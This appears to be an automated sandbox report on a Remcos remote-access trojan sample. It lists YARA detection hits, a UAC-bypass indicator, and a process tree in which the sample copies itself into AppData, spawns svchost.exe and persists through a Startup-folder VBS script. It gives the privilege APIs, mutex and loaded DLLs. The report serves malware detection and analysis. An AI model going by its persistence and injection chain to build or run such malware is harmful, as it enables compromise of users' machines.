                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: jv4ri.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9930708547993492
                  Source: name.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9930708547993492
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@16/22@0/1
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDA2D5 GetLastError,FormatMessageW,0_2_00CDA2D5
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC8713 AdjustTokenPrivileges,CloseHandle,0_2_00CC8713
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00CC8CC3
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00078713 AdjustTokenPrivileges,CloseHandle,2_2_00078713
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00078CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00078CC3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_0041798D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0041798D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00CDB59E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CEF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00CEF121
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C74FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C74FE9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0041AADB
                  Source: C:\Users\user\Desktop\jv4ri.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3712
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-S3AD48
                  Source: C:\Users\user\Desktop\jv4ri.exeFile created: C:\Users\user\AppData\Local\Temp\aut4DA0.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: jv4ri.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\Desktop\jv4ri.exeFile read: C:\Users\user\Desktop\jv4ri.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\jv4ri.exe "C:\Users\user\Desktop\jv4ri.exe"
                  Source: C:\Users\user\Desktop\jv4ri.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\jv4ri.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jv4ri.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 736
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 784
                  Source: C:\Users\user\Desktop\jv4ri.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\jv4ri.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jv4ri.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
